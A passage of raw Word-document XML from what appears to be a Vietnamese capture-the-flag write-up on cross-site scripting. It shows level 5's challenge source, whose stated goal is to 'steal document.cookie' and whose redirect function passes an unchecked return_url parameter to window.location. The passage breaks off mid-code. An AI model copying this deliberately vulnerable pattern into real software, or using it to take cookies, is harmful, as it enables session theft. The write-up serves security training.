                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29004108" w14:textId="63616481" w:rsidR="00B10EA9" w:rsidRDefault="00B10EA9" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả cho </w:t>
      </w:r>
      <w:r w:rsidR="007E5B2F">
        <w:t>thấy rằng đã thành công lấy được flag của bài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08260918" w14:textId="36379A69" w:rsidR="00C30C00" w:rsidRDefault="00C30C00">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA57AF" w14:textId="633177A2" w:rsidR="00C30C00" w:rsidRPr="00FF23DE" w:rsidRDefault="00C30C00" w:rsidP="00C30C00">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30C00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A6469">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6892AA84" w14:textId="582F7F23" w:rsidR="00C30C00" w:rsidRPr="00377B0F" w:rsidRDefault="007E5B2F" w:rsidP="00C30C00">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thông tin source code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841552" w:rsidRPr="00841552" w14:paraId="4C0CA97D" w14:textId="77777777" w:rsidTr="00841552">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F7A9E4B" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E175239" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FBA50A4" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B467D6" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="190068CB" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC0E486" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="660BCC08" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9F4990" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D6006B" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36DAB9F3" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="001C7826" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F39E740" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B696ADA" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263504F0" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B0B3990" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AC2300" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC7A119" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7C1DB7" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538CC2F5" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2003CC" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193E9E4D" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="124BA6C0" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B48BEC1" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CAFC5B" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76400DD7" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="125FE8B2" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="046EA43F" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239FC57A" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4367A2D3" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79DE59C2" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="622650E6" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72FA7745" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:lastRenderedPageBreak/>
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DBE8B9A" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61FE5E65" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76784585" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F0FF0AE" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21913CAC" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BD156E4" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08FF62D1" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:lastRenderedPageBreak/>
              <w:t>&lt;h1&gt;Quick Note 5&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487E9450" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">    &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B0C973B" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">    &lt;p&gt;Input your email to continue ... &lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D1287ED" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">    &lt;form action="/user" method="post" onsubmit="setInfo(event)"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF57299" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        &lt;label&gt;Email: &lt;/label&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353A602D" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        &lt;input type="text" name="email"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B887D49" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        &lt;input type="submit" value="</w:t>
            </w:r>
            <w:r w:rsidRPr="00841552">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>📝</w:t>
            </w:r>
            <w:r w:rsidRPr="00841552">
              <w:t>"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3B1250" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B3A7B21" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D926254" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">    &lt;p&gt;Goal: steal document.cookie&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D2F2FA" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2EC03F15" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">    &lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2040CF70" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        function setInfo(event) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7162C81D" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            event.preventDefault();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A3E4DC" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            data = { "email": event.target.elements.email.value };</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B8FD485" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            fetch("/user", {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47D8AAE3" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">                method: "post",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E20A59F" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">                headers: {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="257EB8D4" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">                    'Content-Type': 'application/json'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09855E5B" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">                },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C818B85" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">                body: JSON.stringify(data),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D24B93" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            }).then(() =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EAA3393" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">                localStorage.setItem("info", "true");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72895AE7" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">                redirect();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A713B38" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F98B05" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7456F0B7" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="465D9BA2" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">        function redirect() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10287923" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            var url = new URL(window.location);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BBBDAAD" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            var return_url = url.searchParams.get("return_url");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70C10A11" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:t xml:space="preserve">            window.location = return_url;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38AC2BAE" w14:textId="77777777" w:rsidR="00841552" w:rsidRPr="00841552" w:rsidRDefault="00841552" w:rsidP="00841552">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00841552">
              <w:lastRenderedPageBreak/>
